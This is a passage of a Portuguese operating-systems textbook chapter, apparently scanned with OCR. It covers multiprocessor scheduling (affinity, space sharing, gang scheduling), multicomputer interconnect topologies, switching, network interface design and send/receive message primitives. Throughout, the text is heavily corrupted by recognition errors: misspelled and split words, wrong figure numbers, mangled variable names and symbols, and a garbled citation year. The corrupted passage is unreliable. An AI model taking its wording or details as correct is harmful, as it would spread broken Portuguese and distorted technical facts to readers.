łona men to, u sad a por todas as CPUs, o tempo compartilhado 
das CFUs ocorre como ein um sistema monoprocessador. 
Ele tambeni fornece balaoceamcnto dc carga aut o mat i co, 
pois nunca pode ocorrer dc urna CPU estar odosa cnquan- 
to outras estao sobrecarregadas, Duas desvantagens desse 
metodo sao a contenęao em potendal para a estrutura de 
dados de escalonamento a medida que o mimero de CPUs 
eresce e a sobrecarga usual na realizaęao do chaveaniemo 
de contexto quando o tliread bloqueia para E/S. 


Pode haver ainda um diaveamento de comexto 
quando acabar o quantum de um processo. Em um mul- 
tiprocessador, esse fato apresema certas propriedades que 
nao ocorre ni em um monoprocessador, S uponha quc u m 
thread esteja marnendo urna variavel de travarnento 
ąuando seu ąuantum expira. As outras CPUs que estao 
esperando a variavel simplesmente dcsperdięam scus 
tempos testando continuamente atc que oquelc processo 
seja escalonado de novo c libere a variavel de travamen- 
to. Em um monoprocessador, esse esąuema raramente e 
usatlo, e, assim, se um processo e suspenso enquaruo re- 
tern u m miitex e um omro thread i nicią e renta adquiri- 
-lo, este e imediatamente bloqueado, de modo que pouco 
tempo e desperdięado* 

Para rcsolvcr essa anormalidadc, alguns sistemas usam 
escalonamento inteligente, no qual urn processo, ao ad- 
ąuirir urna variavel de travamento, aj usta um flag para mos- 
trar que es ta com a variavd de travamento no memento 
(Zahorjan et al. F 1991). Ao liberar a variavcl de travamctilo, 
dc limpa o flag, O escalonador, entao, nao para o thread 
que esta retendo urna variavd de iravameruo, mas, em vez 
disso, da um pouco mais de tempo para que ele com ple te 
sua regiao crftica e libere a variavel de travamento. 

Uma outra questao rdevanie no escalonamento e o 
faro de que, apesar dc todas as CPUs serem sciudhantes, 
alguinas sao mais semdhantes, Em particular, ąuando o 
processo A executou durante um longo tempo na CPU k 
a cache dessa CPU esta dieia de blocos de A. Se A deve ser 
cxeaUado novamcntc em breve, e posswel quc de cxecute 
md hor na CPU k , porque a cache de k ainda pode conter 
alguns blocos de A. Com os blocos da cache pre-carregados, 
a taxa de acerto na cache aumentara e o desempenho do 
thread sera maior. Alem disso, a TLB tambem pode conter 
as paginas corretas, reduzindo falhas. 

Alguns multiproccssadorcs lcvam esse lato cm consi- 
deraęao e usam aąttilo que ć chamado de escalonamento 
por afinidade (Vaswam c Zahorjan, 1991). A ideia basica 
e esforęar-se bastante para exeaitar um processo na mes- 
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1 Figura 8.12 Uso de uma unica estrutura de dados no escalonamento de Lim multiprocessador. 
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ma CPU em que ele ja executou anteriormente. Um modo 
de criar essa afinidade e empregar um algoritmo de es¬ 
calonamento de dois mveis, Ao ser criado, um thread 
e aJocado para unia CPU, com base, por exemplo, na que 
possui a racnor targa dc trabaliio naąiicle moment o. Essa 
alocaęao dc rhrcads a CPUs faz parte do niVel superior do 
algoritmo, Como resultado, cada CPU adąuirc sua própria 
colcęao de threads. 

O escałona niemo real de threads compoe o nivel in- 
ferior do algoritmo. Ele e feito para cada CPU separada- 
nicnte, usando prioridades ou algum outro meio. Tentando 
manier um processo na mesma CPU por todo seu tempo de 
vida, a afinidade da cache c ma x i mi za da, Contudo, sc unia 
CPU nao tem nenhum proccsso para executar, da obtem 
algum dc lima outra CPU em vez de sc toniąr ociosa, 

O escalonamento em dois mveis apresenta tres bene- 
Firios, Primeiro, de distribui a carga de modo aproximada- 
mente uniforme entre as CPUs dispomveis. Em segundo, 
a yantagem da afinidade da cache ć obtida quando possi- 
vcl. Em tcrceiro lugar, dar a cada CPU sua própria lista dc 
prontos minimiza a contenęao por aquela, pois as tentati- 
vas de usar a lista de projetos prontos de u ma mitra CPU 
naosao assim tao freąuemes. 

ComparfilKamento de espaęo 

A outra csuaiegia gorał para escalonamento de mul- 
liprocessador pode ser usada quando os threads sao de 
algum modo reladonados uns a os outros. Ja mendona- 
mos o comando make paralelo como exemplo. Muitas 
vczcs tambem ocorre dc um rinico processo criar nuilti- 
plos threads para trabalharcm junt os. Por cxcmplo, sc 
os threads de um processo se comunicam mu i to, e tkil 
fazędos execmar ao mesmo tempo. O escalonamento de 
miiltiplos threads ao mesmo tempo sobre multiplas CPUs e 
chama do dc compartilhamento de espaęo. 

O algoritmo de compartilhamento de espaęo mais sim- 
plcs trabalha da seguinte maneira, Suponha que um grupo 
inteiro de threads rei a ci on ad os seja criado de urna vez. No 
momento em que ele e criado, o escalonador verifica se 
existem tantas CPUs livres quanto o mimero de threads. Sc 
houver r cada thread reccbe sua própria CPU dedicada (Isto 
e, nao multiprogramada) e todos os threads podem iniria- 


lizar. Se nao existe CPU sufieiente, nenhum dos threads 
e iniciado ate que o mmimo necessario esteja disponwel. 
Cada thread detem sua CPU ate que temilne, quando, en- 
tao, a CPU e devolvida para o conjunio de CPUs disponf- 
vris, Se um thread e bloqucado cm u ma E/S, clc continua 
segurando a CPU, quc pcrmanece ociosa ate quc o thread 
acordc. Quando o próximo lote dc threads aparece, o mes¬ 
mo algoritmo e aplicado, 

Em qualquer momento, o conjunto de CPUs e estati- 
camente dividido em um mimero de partięóes, e cada urna 
executa os threads de um grupo. Na Figura 8,13 r temos 
partięócs dc tamanhos 4, ó, 8 e 12 CPUs, com duas CPUs 
nao alocadas, como cxcmplo, Com o passar do tempo, o 
nu mero c o tama n ho das partięoes sao modificados confor- 
mc os novos threads sao criados e os antigos sao eondindos 
ou encerrados, 

Periodicamente, e necessario que se tomem decisóes 
de escalonamento. Em sistemas monoprocessadores, o al¬ 
goritmo tarefa mais curta primeiro (shortestjobfirst) e bem co¬ 
li hccido para escalonamento cm lote. O algoritmo analogo 
para um multiprocessador consistc cm escolhcr o processo 
que predsa do menor n u mero de cidos de CPU, isto e, o 
processo cujo contador de CPU versus tempo de execuęao 
seja a menor entre os candidatos. Comudo, na pratica, essa 
informaęao raramente esta dispomvel, de modo que se toi¬ 
na complicado realizar o algoritmo. Na yerdade, estudos 
tem de monstra do que, de faro, e diffcil superar o algoritmo 
primeiro a che$ar t primeiro a ser sewido (firsi-come, first serwd) 
(Krueger et al., 1994). 

Nesse modelo simples de partięao, urn thread sini pies- 
mente pede um mimero de CPUs e ou consegue todas elas 
ou tern de esperar ate que elas estejam disponweis, Urna 
abordagem di terenie pode ser permitir que os threads ge- 
rendem ativaniente o gra u de paralelismo. Um dos meto- 
dos para gerenciar o paralelismo e ter um servidor central 
mantendo o controle de quais threads estao sendo execu- 
tados, qtuiis querem executare quais sao suas neccssidades 
muiimas c maximas de CPU (Tuckcr c Gupta, 1989), Perio¬ 
dicamente, cada aplicaęao tesla o servidor central para per- 
guntarąuanlas CPUs da pode usar, Entao, a aplicaęao aj u s- 
ta o numero de threads para mais on para menos a firn de 
corresponder ao que esta dispomveI. Por exemplo, um ser- 
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] Figura 8.13 Conjunto de 32 CPUs agrupadas em ąuatro partięoes, com duas CPUs disponiveis. 
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vidor da Web pode ler 5, 10, 20 ou qualqiier outro numero 
de threads execulando em paralelo. Se ele tem dez threads 
no momento e surge repen ti na mente mais denianda por 
CPUs, sendo ele ordenado a rednzir para dnco r quando os 
próxtmos rinco threads finalizarem scus trabalhos atuais, 
clcs scrao ordenados a sair cm vcz dc rcccbcr novo traba- 
łho* Essc esąuema pcrmitc quc os tamanhos das partięocs 
vanem dinarnicamente para corresponder mdhor a carga 
dc iraballio amal cm cornparaęao com a solnęao mostrada 
na Figura S.J 3. 

Escalonamento em bando 

Uma vantagem mtida do compartilhamento dc espaęo 
e a climinaęao da multiprogramaęao, quc pde lim a sobre- 
carga causa da pet o chaveamento dc contcxto. No cntamo, 
uma desvantagem igualmente clara e o desperdirio dc tem¬ 
po ąuando a CPU bluqueia c nao tern nada para fazer ale 
quc da esteja pronla de novo. Consequeniememe, tem- 
-se btiscado algoritmos que temam escalonar em tempo e 
espaęo, espedalmente para processos que criani niuhiplos 
threads, que geralmenle predsam comunicar-se uns com 
os outros. 

Para entender o lipo dc próbie ma que pode ocorrer 
quando threads de um processo sao escalonados indepen- 
denlemenle, considere urn sistema com threads A fl c A, 
pertencentes ao processo A e threads e 5, pertencciues 
ao processo B. Os ihreads A 0 e B (1 compartilham o tempo na 
CPU 0: os threads A l e companilhain o tempo na CPU 1. 
Os threads A. h e A, muitas vezes prccisam comunicar-se en- 
tre sL O padrao de comumcaęao e o seguiote; A 0 eiwia uma 
mensagem para A r e A t entao envia uma resposta para A iy 
segukla por out ras scąuendas do mesmo lipo, Suponha 
que, por casualidade, A L) c B i imriem primeiro, como mos- 
tra a Figura 8* 14* 

Na faiia dc tempo (timesłioe) 0, A 0 envia uma reqiusięao 
para A ]t mas A t nao rcccbe a rcquisięao ale cxecutar na 
faiia dc tempo L quc sc inida no tempo 100 ins. A, entao 
cnvia uma resposta imediatameme, mas A i} nao rceebe a 
resposta ale executar de novo no tempo 200 ms. O resulia- 
do e uma seąucncia de reąuisięao- resposta a ca da 200 ms, 
o que nao e muilo bom. 


A soluęao e o escalonamento em bando (gang sche¬ 
da ling), uma evoluęao natura! do co escalonamento (Ous- 
terhout, 19S2). O escalonamento em bando tem tres partes: 

t. Os grupos dc threads relacionados sao e scalona do s 
como uma unidade cha ma da bando. 

2. Todos os membros dc um bando executam sinrml- 
taneamente, em diferentes CPUs com tempo com- 
partilhado, 

3 + Todos os membros de um bando iniciam e fmalizam 
jmnos suas fatias dc tempo, 

O segredo para o escalonamento em bando funcionar 
e que todas as CPUs sao escalonadas de maneira smerona, 
Isso significa que o tempo e dividido cm quanta discretos 
como na Figura 8.14. No inicio de cada novo quantmn, 
lodas as CPUs sao ree scalona das, com um novo thread sen¬ 
do iniciado em cada uma. No infdo do quamum seguime, 
ocorre um outro evento de escalonamento. Entre eles, ne- 
nhum e scalona men lo e feiio. Se um thread e bloąucado, 
sua CPU permanece ociosa a te o finał do quamum. 

Um cxemplo de como o escalonamento em bando 
fundona e dado na Figura 8J5. Nela temos um mul lipro- 
cessador com seis CPUs sendo usadas por cinco processos, 
de A a E f com um total de 24 threads prontos. Durante o 
intervalo dc tempo 0, os threads de A 0 a A 6 sao escalonados 
c execuLados. Durante o mtcrvalo dc Lempo i, os threads 
Bp B y C Qt C { c C 2 sao escalonados e exccuiados. Durante 
o intervalo de tempo X os cinco threads de D e E conse- 
guem a exccuęao. Os seis threads restames pertencentes ao 
processo E executatn no intervalo de tempo 3. Em seguida, 
o ciclo se repeie, com o iniervalo 4 sendo o mesmo que o 
iniervalo 0, e assim por dianie, 

A idcia do escalonamento cm bando e ter todos os 
threads de um processo executantlo jumos, de modo que, 
se um deles envia uma requisięao para um outro, esse oit- 
tro obiera a mensagem quase que imedialainente e sera 
capaz de responder tambem quase de imediato. Na Figu¬ 
ra 3.15, visto que todos os threads de A estao executando 
juntos, durante um mesmo quantum, eles podcm enviar 
c receber um nu mero niinto grandę de mensagens nesse 
ąitanium, climinando, assim, o prób Je ma da Figura 8.14. 
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I Figura 8.14 Comunicaęao entre dois threads pertencentes ao thread A que estao sendo executados fora de fasę. 
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i Figura 8,15 Escalonamento em bando. 



Multicomputadores 


Mukiprocessadores sao popularcs e atrativos porque 
otercccm um modclo de comunicaęao simples: todas as 
CPUs compariilham ij ma memória comum. Os processos 
podem escrever mensagens na memória, que pode, depois, 
ser lida por outros processos. A sincranizaęao e posswel 
medianie o emprego de mutexes, semaforom momtores e 
outras tecnicas bem definidas, A unica desvantagem c que 
os irmit[processadores de grandę porte sao dificeis de cons- 
truir e, portanto, sao caros. 

Para solucionar esses problemas, nuika pesquisa leni 
sido feita com multicomputadores, que sao CPUs forle- 
menie acopladas qtte nao compariilham memória. Gada 
CPU tem su a própria memória locaL como mosira a Figura 
S.l(b). Esses sistemas tainbem sao conheddospor urna va- 
riedade de outros nomes, como aglomerados de compu- 
tadores e COWS {clustm of workstafiom— aglomerados 
de esiaęoes de trabalho). 

Multicomputadores sao faceis de construir porque o 
componente basico consiste em apenas um PC poro com 
a adięao de urna płaca de interface de rede, Olwiamente, 
o segredo da obtenęao dc alt o desempenho e projetar dc 
modo inteligente a rede dc interconexao e a płaca de inter¬ 
face. Esse probiernia e completamente analogo a consmi- 
ęao de memória compartiJhada em um multiprocessador, 
Contudo, o objetivo e cnviar mensagens cm um tempo na 
escala de niicrossegiindos — em vez de acessar a memória 
em um tempo na escala de nanossegundos —, sendo assim 
mais simples, barato e facil de implementar. 

Nas seęócs seguintes, abordaremos resumidamemc o 
hardware dc multicomputador, espcrialmeme o hardware 
de interconexao. En tao, passa remos a analisar o software, 
inidando com o software de comunicaęao dc baixo nivd 
c depois o software de comunicaęao de alto nfvel. Conhe¬ 
ce remos ainda uma forma de memória compartilhada que 
pode ser realizada cm sistemas que nao dispóem dda. Por 
(im f virao o escalonamento e o balanceamento de carga. 


8,2,1 I Hardware de multicompiitador 

O nó basico dc um multicomputador e formado por 
uma CPU, memória, uma interface de rede e, algumas ve- 


zes, um disco rfgido. O nó pode ser empacotado em um 
gabinete-padrao de PC, mas o adaptador gra fi co, o moni¬ 
tor, o tcclado e o mouse estao quasc sempre ausentes, Em 
alguns ca sos, o PC contem uma płaca de multiprocessador 
com duas ou ąuatro CPUs, cm vcz dc uma unica CPU, mas, 
para simplificar, presumiremos que ca da nó tem uma CPU. 
Muitas vczcs, centcnas ou ate milhares dc nos Hgam-se 
para formar um multicomputador. A seguir, veremos como 
esse hardware e organizada 

Tecnologia de interconexao 

Cada nó tem uma płaca de interface de rede com um 
ou dois cabos (ou ftbras) saindo dola. Esses cabos conec- 
tam-se a outros nos ou a comutadores (switches). Em um 
sistema peąueno, pode existir um comutador ao qual todos 
os nos sao conectados, como no model o es trel a da Figu¬ 
ra S.ló(a). As redes modemas padrao Ethernet empregam 
essa topologia. 

Como altcmativa ao projeto de um rinico comutador, 
os nos tambem podem formar um and, com dois fios co- 
ncctados a płaca dc rede, um i udo para o nó a sua esąuerda 
e o outro irulo para o nó a sua di rei ta, como m ostra a Figu¬ 
ra Srió(b). Nessa topologia, nenhum comutador c necessa- 
rio e nenhum e most rado. 

A grade ou malha (grid ou mesh) da Figura S.lófc) 
ć um projeto bidimensional que tem sido empregado ern 
muitos sistemas comerciais. Ela e altamente regular e fa- 
cil dc cscalar para tamanhos grandes. Sen diómetro e o 
caminho mais longo entre quaisquer dols nos e alimen¬ 
ta somente em funęao da raiz qu ad rada do nu mero de 
nós. Uma variante para a grade e o toro duplo da Figura 
S.ló(d), uma grade com as margens concciadas, Eła c mais 
toierante a falhas do quc a grade; alem disso, tem um dla - 
metro mc nor, pois os cantos opostos agora podem se co- 
municar em somente dois passos. 

O cubo da Figura 8,1 ó(e) e uma topologia tridimen- 
sionał regular. A figura ilusira um cubo 2x2x2, mas 
em sua forma geral de poderia ser um cubo k x k x k. Na 
Figura S.16(f), lemos um cubo tetra di mensional construi- 
do a partir de dois cubos tridimensionais com os nós eor- 
respondentes conectados. Poderiamos fazer um cubo de 
quima dimensao ulilizando a estrutura da Figura 8J6(f) 
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I Figura 8.16 Varias topolog ias cie interconexao. (a) Uma chave simples. (b) Um anel. (c) Urna gracie, (d) Um loro dupie. (e) Um cubo. 
(f) Um hipercubo 4D. 


c eonectando os nos corrcspondenies a fim de formar um 
bloco de ąiiatro cubos. Para obter uma topologia de sexta 
dimensao, podcriamos replicar o bloco de ąuatro cubos e 
intcrconcctar os nos correspondentes, c assim por diante. 
Um cubo n dimcnsjonaJ assim formado e cha mado dc hi¬ 
percubo. Muitos computadores pa rai cios empregam cssa 
topologia porque o diametro cresce linearmente com a di- 
mensionalidade. Em ontras palavras, o diametro e o ioga- 
ritmo na base 2 do numero de nos; assini, por exeniplo, um 
hipercubo de di mensa o 10 tem 1.024 nós, mas um dia me¬ 
tro de somente 10, oferecendo excekntes propriedadcs de 
a traso. Notę que, em contraste, 1.024 nos agrupados como 
uma grade dc 32 x 32 tem um diamctro de 62, mais dc 


seis vezes piór quc o do hipercubo. O prcęo pago por um 
diamctro menor e que o leque de saidas {fanom) e\ conse- 
ąuemeraente, o numero de ligaęoes (e o custo) sao muito 
maiores para o hipercubo. 

Dois lipos de esquenias de comutaęao sao usados nos 
multicomputadores. No primeiro caso, ca da mensagem e 
primeiro quebrada (ou pclo software do usuarioou pela in- 
terfacc de redc} em um bloco de algum tamanho maximo 
cha mado de paco te. O esąuema de comuiaęao, denomi- 
nado comutaęao de pacotes armazenar e encaminhar 
(stcre-and-forward packet swhchhnj}, consiste na injeęao do 
pa cole na pri metra chave pela płaca dc redc do nó renie- 
lenie, como rnostrado na Figura 8.17(a). Os bils chegam 
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I Figura 8.17 Comutaęao de pacotes armazenar e erteaminhar. 
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urn de cada vez e, quando o pacote todo tiver chegado a inn 
btiffer de entrada, cle e copiado ao próximo comutador ao 
longo do caminho, como ilustra a Figura 8.17(b). Quando 
o pacote surgc na ciiave ligada ao nó destinatario — como 
vcmos na Figura 8.17(c) —■, o pacote ć copiado para a in¬ 
terface dc rcdc daquck nó c, por firn, para sua RAM, 

Se, por urn lado, a comutaęao de pacotes ariiiazenare 
encaminliar e flexivel e eficiente, por outro ela apresenta o 
probiema de aumentar a latencia (atraso) pela rede de inter- 
conexlo. Suponha quc o tempo para mover um pacote na 
Figura 8.17 em um passo seja T ns. Visto que o pacote deve 
ser copiado quatro vczes para ser transferido da CPU 1 para 
a CPU 2 (para A, para C para D e para a CPU destinataria) 
c nenii urna cópia pode comeęar ate quc a anterior seja fi- 
nalizada, a latencia ao longo da rede de interconcxao e AT. 
Urna safda e projetar urna rede em que cada pacote pode 
ser logi ca menie dividido em unidades menores, Tao logo 
a primeira unidade chegue a chave, ela pode ser movida 
para a chave seguinte, mesmo a mes de o finał do pacote 
ter chegado. A unidade pode ser tao pequena quanto i bit. 

O outro csquema dc comutaęao, a comutaęao de 
circuito, eonsiste cm o comutador remctcnte cstabekcer 
primeiro urna rota atraves de todos os comutadores ate t> 
comutador destinatario. Urna vez que o caminho fol esia~ 
belecido, os bits sao bombeados ate o firn, da origem para 
o destino, sem parar. Nao existe a uiilizaęao de bu ller in- 
termediario interferindo na comutaęao. A comutaęao de 
Circuit os reąuer urna fasę de estabeledmento do caminho, 
que consome algiim tempo, mas e mais rapida depois quc 
esse estabeledmento foi concluido. Após o pacote ter sido 
cnviado, o caminho devc ser desfeito novamcnte. Urna va- 
riaęao da comutaęao dc drcuito, chamada dc roteamen- 
to wormhole (wormhck routing), ąuebra cada pacote em 
subpacmes e pennite qiie o primeiro subpacote inicie antes 
mesmo de o caminho todo ter sido construfdo, 

interfaces de rede 

Todos os nos de um multicomputador tern urna płaca 
plug-iti contcndo a conexao do nó com a rede de intercone- 


xao que mantem o multicomputador unido. O modo como 
essas placas sao constnudas e se conectam a CPU principal 
e a RAM tem implicaęóes importantes para o sistema ope¬ 
ra cionai. Vercmos brevemente algumas dessas questdes. 
Este materiał ć baseado cm Bhoedjang (2000). 

Em todos os mul licompu tadores, a płaca de interface 
comem alguma RAM para armazenar os pacotes de entrada 
e salda. Normalnienie, um pacote de saida tern de ser copia¬ 
do para a RAM da płaca de interface antes que de possa ser 
transmitido para o primeiro comutador. A justifkativa para 
esse projeto e que muitas redes de kiterconexao sao sin ero- 
nas, dc modo que, urna vez que a transmissao de um pacote 
tenha sido iniciada, os bits dcvcm continuar fluindo em unia 
łaxa constantc, Sc o pacote esta na RAM principal, esse fiu- 
xo tonlmuo de saida para a rede nao pode ser ga rant ido em 
vinude de ontros irafegos nt> barramento da memória, Esse 
probiema e elimmado usando u ma RAM dedicada na płaca 
de interface. Esse projeto e mostrado na Figura 8.18. 

O mesmo probiema ocorre com os pacotes de entrada. 
Os bits chegam da rede em u ma taxa constantc e, muitas 
veze$, exueinameme aka. Se a płaca de rede tiao puder ar- 
mazenados em tempo real no momemo em que des che- 
gam, os dados sao perdidos. Novameme nesse caso, lenlar 
ir pelo barramento do sistema (por exemplo, barramento 
PCI) para a meinória principal e rnuito arriscado. Visto que 
a płaca de rede em geral e conectada a um barramento PCI, 
essa e a unica conexao existente para a RAM principal e, 
assim, a competlęao por esse barramento com o disco e ło- 
dos os outros dispositivos de E/S torna-se inevitavel. E mais 
seguro annazenar os pacotes que chegam a unia RAM pri- 
vada da płaca dc interface e posteriormeme copia-łos para 
a RAM principal. 

A płaca de interface pode ter um on mais canais de 
DMA ou ainda urna CPU completa (ou mesmo inuitas 
CPUs completas). Os canais de DMA podem copiar pacotes 
entre a płaca de interface e a RAM principal em alta ve!o- 
ddadc por mci o de urna solicitaęao dc transferencia de um 
blocopelo barramento do sistema, tran sfer i ndo, assim, va- 
nas palavras sem a necessidade de requisilar o barramento 
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I Figura 8,18 Posięao das placas de interface de rede em um multicomputador. 
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separadameme para cada uma. No emanto, e jtisiameme 
esse tipo de transferencia de bloco que interrompe o barra- 
menio do sisiema durame varios ciclos de b ar ra mento, fa- 
zendo com que a RAM da płaca de interface scja necessaria 
cm primciro lugar, 

M iii las placas de interface possucm nelas uma CPU 
completa, possivdmente em adięao a um on mais canais 
de DMA. Eles sao chamados processadores de rede e 
estao se tomando cada vez mais poderosos. Esse projcio 
significa que a CPU pnncipal pode deixar algum trabalho 
para a płaca dc rede, como o tratamento de transmissao 
confiavel (caso o hardware subjacente perca pacotes), mul- 
ticasting (envio de pacotes para mais de um destinatario), 
compactaęao/descompactaęao, criptografia i descriptografia 
e cuidado da proteęao em sistema com multiplos processos. 
Enireuinio, com duas CPUs clas devem sincronizar-se para 
evitar condięóes dc corrida, adidonando sobrccarga cxtra c 
implicando mais trabalho para o sistema opcracional. 

8-2.21 Software de comunicaęao de baixo 
mvel 

O inimigo da comunicaęao de alto desempenho em sis- 
temas de multicompuiadores c a cópia excessiva de paco¬ 
tes, Na md hor situaęao, existira uma cópia da RAM para a 
płaca dc interface no nó remetcntc, lima cópia da płaca dc 
interface rcmetente para a płaca de interface destinataria 
{caso nenii u m mitro amiazenamento e enca min ha mento 
de pacotes ocorra no meio do caminho} e uma cópia des- 
sa ultima para a RAM destinataria, totalizando tres cópias. 
Eiureuuuo, em muiios sistemas o ąuadro ć ainda piór. Em 
panien lar, sc a piaca de interface e mapeada no espaęo dc 
endereęamento virtual do nulceo c nao no espaęo dc ende- 
reęamenio virtual do usuario, um processo do usuario pode 
apenas enviar um pa cole por intermedio de uma cha mada 
de sistema, a qual desvia para o nucleo, Os nucleos podem 
ter de copiar os pacotes para suas próprias memórias Lamo 
na saida quamo na entrada, para evitar, por exemplo, faltas 
de pagina durame a transmissao pela rede. Alem disso, e 
provavel que o nucleo que es ta recebendo nao saiba omie 
colocar os pacotes que chegam ate que cle tenha tido opor¬ 
ni nidade de examina-los. Esses cinco passos dc cópia sao 
ilusirados na Figura 8.18. 

Sc as cópias para a RAM e da RAM representam um 
gargalo, as cópias cxtras para o nucleo e a partir do nii- 
dco podem dupliear o atraso firn a (im c red uzi r a vazao 
pela metade, Para evitar esse golpe no desempenho, mui- 
tos multicoinputadores inapeiam a płaca de interface direta- 
mente no espaęo do usuario e permitem que o processo do 
usuario coloque os pacotes di ret a menie na płaca, sem que 
o nucleo seja envolvido. Apesar de essa estrategia ajudar 
no desempenho, cła introduz dois problemas. 

Primciro, o quc ocorre se varios processos estao exe- 
culando em um nó e predsam acessar a rede para enviar 


pacotes? Qual obiera a płaca de interface em seu espaęo de 
endereęamento? Ter uma chama da dc sistema para mapear 
a piaca dentro e fora de um espaęo de endereęamento vir- 
lual e caro, mas, se somente um processo consegue a płaca, 
como os demais enviarao pacotes? E o que acontece se a 
płaca e mapeada dentro do espaęo de endereęamento do 
processo A c um pa co te chega para o processo B, especial- 
mente se A e B tern proprieiarios diferenies e nenbum de- 
Ics qucr fazer qualqucr csforęo para ajudar o outro? 

Uma soluęao e mapear a płaca de interface em todos 
os processos que predsam dda, mas, nesse caso, faz-se ne- 
ccssario um meeanismo para cvitar condięóes de corrida. 
Por exempio, um desastre nos resultados podera ocorrer 
se A reivindicar um buffer na płaca de interface e se de- 
pois, em decorrćnda da multłprogramaęao, B executar c 
reivindicar o mesmo buffer Algum lipo dc meeanismo de 
sincronizaęao e necessario, mas esses mecanismos, como os 
muLexes, funcionam apenas quando os processos sao coo- 
perantes. Em um ambiente dc tempo compartilhado, com 
varios usuarios apressados para terminar scus trabalhos, 
um usuario pode simpksmeme reter o mutex associado a 
płaca c nunca mais libera do. A concłusao nesse caso e que 
o mapeainento da płaca de interface no espaęo do usua¬ 
rio só funciona be ni ąuando de fato existe somente um 
processo do usuario execu lando em cada nó, a menos que 
sejam tomadas precauęoes especiais (por exemplo, proces¬ 
sos diferenies obtem partes diferenies da RAM da interface 
mapeada em seus espaęos de endereęamento). 

O segundo probkma e que o nucleo pode precisar 
acessar a rede de imerconexao por si próprio, para, por 
exemplo, acessar o sistema de arquivos em um nó remoto. 
Nao e uma boa ideia o nucleo ser obrigado a compartiihar 
a płaca de interface com qualquer usuario, mesmo em um 
modelo de tempo companiIliado. Suponha quc, enquanto 
a płaca estava sendo mapeada no espaęo do usuario, um 
pacote do nucleo tenha chega do. Ou entao imagine que o 
processo do usuario enviou um pacote para uma miquina 
remota łingindo ser o nucleo, A conclusao e que o projeto 
mais simpłes e ter duas placas de redes: uma mapeada no 
espaęo do usuario para o trafego de apiicaęoes e uma ma¬ 
peada no espaęo do nucleo para uso do sistema operacio- 
nal. Muitos iiiułticompiitadores fazern predsamente isso, 

Comunicaęao entre o nó e a interface de rede 

Uma outra questao consiste em como copiar os paco¬ 
tes para a płaca de interface. A maneira mais rapida c usar 
o chip de DMA da płaca para simplesmente copia-los da 
RAM. O problema dessa soluęao e que o DMA usa endere- 
ęamento fislco em vez de virtuał e exccuta independente- 
mentc da CPU. Para comeęar, embora o processo do usuario 
certamente conheęa o endereęo viriual dc qualquer pacote 
que de ąueira envtar, em geral de nao eon hece o ende¬ 
reęo fisicG. Permitir quc uma chamada de sistema faęa o 
mapeaniemo viiiual-lisico e indesejavcl, visio que a razao 
primordial da colocaęao da płaca de interface no espaęo do 
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usuario era evitar fazer urna chamada de sistema para ca da 
pacote que fosse erwiado. 

Alem disso, sc o sistema operacional dccide substituir 
unia pagina enąuanto o chip de DMA esta copiando urn 
pacote dda, os dados incorretos sera o transmihdos. Piór 
ainda: se o sistema operacional substiiui uma pagina en¬ 
ąuanto o chip de DMA esta copiando nela um pacote de 
entrada, nao só o pacote sera perdido, mas tambem uma 
pagina de memórta inocente sera arruinada. 

Esses problemas podem ser evitados com chamadas 
de sistema para prender {phi) e soltar {unpin) paginas na 
memória, marcando-as temporariamenie como nao pa- 
ginaveis. Gontu do, ter de fazer uma chamada de sistema 
para prender uma pagina contendo ca da pacote de salda e 
depois fazer uma outra chamada de sistema para solta-la e 
muito trabalhoso. Se os pacotes sao pequenos — digamos, 
64 bytes ou menores —, a sobrecarga para prender e soltar 
cada buffer e proibitiva, Para grandes pacotes — digamos, 
de 1 KB ou maiores — essa tccnica poderia ser tolcravcł. 
Para tamanhos intermediarios, depende dos detalhes do 
hardware. Alem dc inuoduzir unia taxa dc desempenho, 
o rccurso de prender e soltar paginas aiunenta a complexi- 
dade do software* 

_ $*2,3 1 Software de comunitaęao no nivel 

do usEiario 

Os processos em diferemes CPUs dc um multicompu- 
tador se comunicam enviando mensagem u os aos outros. 
Em sua forma mais simples, essa troca dc mensagens e ex- 
posta aos processos do usuario. Em outras palavras, o sis¬ 
tema operacional oferece uma maneira dc eiwiar e recebcr 
mensagens e rotinasde bibliotecas tornam essas chamadas 
dispomveis aos processos dos usuarios. Em uma configura- 
ęao mais sofisticada, a troca de men sagom rcai e esetmdida 
dos usuarios fazendo com quc a comunicaęao remota se 
parcęa com uma chamada de rotinas, Estudaremos ambos 
os mćtodos a seguir* 

Envio e recepcao 

No rnmimo, os scrvięos dc comimicaęao ofereddos po¬ 
dem ser reduzidos a duas chamadas (biblkneca): uma para 
ciwiar mensagens e outra para recebe-las. A chamada para o 
envio da mensa gem pode ser 

sendfdest, &mptr); 

e a chamada para o reeebimento da mensagem pode ser 

receive(addr, &mptr): 

A primeira envia a mensagem a pomada por mptr para 
um processo identificado por desie faz com que o chama¬ 
dor seja blbąueado ate que a mensagem tenha sido en- 
viada. A segunda faz o chamador ser bloąueado ate que 
urna mensagem chegue. Quando isso ocorre, a mensagem 
e copiada para o buffer a pomado por mptr e o cha mador c 


desbloąueado. O para metro addrt specifica o endereęo no 
quai o receptor esta a espera. Muitas variantes sao possfveis 
para esses dois procedimentos e seus parametros. 

Uma ąuestao importante e como se faz o endereęa- 
mento. Visto que intilticomputadores sao estaticos, com 
um numero fixo de CPUs, a maneira mais facil de tratar o 
endereęamento e fazer com que o addr seja um endereęo 
de duas part es consistindo em um numero de CPU e em 
um numero de processo ou porta na CPU endereęada. Des- 
se modo, cada CPU pode gerenciar sens próprios endereęos 
sem conflitos em potencial. 

Chamadas bloąueantes versus nao bloąueantes 

As chamadas descritas ameriormeme sao chamadas 
bloąueantes (algumas vezes conheddas como chama¬ 
das sincronas). Quando um processo chama a prirmliva 
send, cle especifica um destinatano e um buffer para cn- 
viar aqude destinatano* Eriąuamo a mensagem esta sendo 
cnviada, o processo emissor ć bloąueado (isto c, suspen¬ 
so). A instmęao seguime a chamada sani nao e ejtcculada 
ate que a mensagem tenha sido compietamente enviada f 
como mostra a Figura B. l9(a), Da mesma maneira, uma 
chamada recem nao retorna o com role ate que uma men¬ 
sagem tenha sido realmenie recebida e colocada no buffer 
dc mensagem apontado pelo para metro. O processo per- 
manece suspenso na primiliva receiie ale que uma mensa¬ 
gem seja recebida, mesmo que isso leve horas. Em algtms 
sistemas, o receptor pode especificar de quem ele de seja 
receber — permanecendo, nesse caso, bloqueado ate que 
uma mensagem do emissor especificado seja recebida. 

Uma altcnialiva as chamadas bloąueantes sao as 
chamadas nao bloąueantes (algumas vezes conheddas 
como chamadas assmeronas). Se send e nao bloquean- 
te f ela retorna i media ta nieme o controle para o processo 
chamador, antes quc a mensagem seja enviada* A vania- 
